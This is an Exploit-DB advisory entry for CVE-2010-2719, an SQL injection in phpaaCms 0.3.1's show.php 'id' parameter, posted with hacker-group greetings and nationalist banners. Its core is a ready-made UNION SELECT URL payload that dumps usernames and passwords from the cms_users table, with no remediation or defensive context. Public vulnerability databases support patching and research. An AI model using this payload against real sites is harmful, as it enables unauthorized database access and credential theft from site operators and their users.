phpaaCms 0.3.1 - (show.php?id=) SQL Injection Vulnerability



EDB-ID: 14199 CVE: 2010-2719 OSVDB-ID: 65994
Author: Shafiq-Ur-Rehman Published: 2010-07-04 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
#´╗┐Exploit Title: phpaaCms (show.php?id=) SQL injection Vulnerable
# Software http://www.phpaa.cn
# Tested on: win 7
# category: webapp
# Code : n/a
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
 MWUHH TO Bl00dMafia: KashmiriMafia, Mirpuri, Mirzatun: gula, Boby, Mota & aSIM^JARRAL
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
       Gr33tz to  All PakISTANI Hackers 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 

 
----- [ Founder ] -----
 
    Shafiq-Ur-rehman
 
----- [ Email] -----
 
    aol.shafiq@gmail.com
 
 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
 {{{{TITLE}}}
 
PHPAA (show.php) Sql injection Vulnerable
 
+++++[ Vendor ]+++++
 
http://www.phpaa.cn
 
                                                        
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 
----- [ SQL Injection ] -----
 
Put [SQL CODE]
 
[Link] http://server/phpaaCMS/show.php?id=1[SQL CODE]
 


             {Tested On}
 
----- [ Live Link (s) ] -----
 
[SQLi] http://<server>/show.php?id=1[CODE]
 
[SQLI] http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users--
 

 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Thanks To All: www.Exploit-db.com | Ksecurity-team Members| 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-muwhhh>>> http://www.sql-injection-tools.blogspot.com
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     >>Live Long Pakistan<<
 
>>> Live Long Azad Kashmir<<<
 
>>> Proude To Be A Kashmiri+Pakistani<<<
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010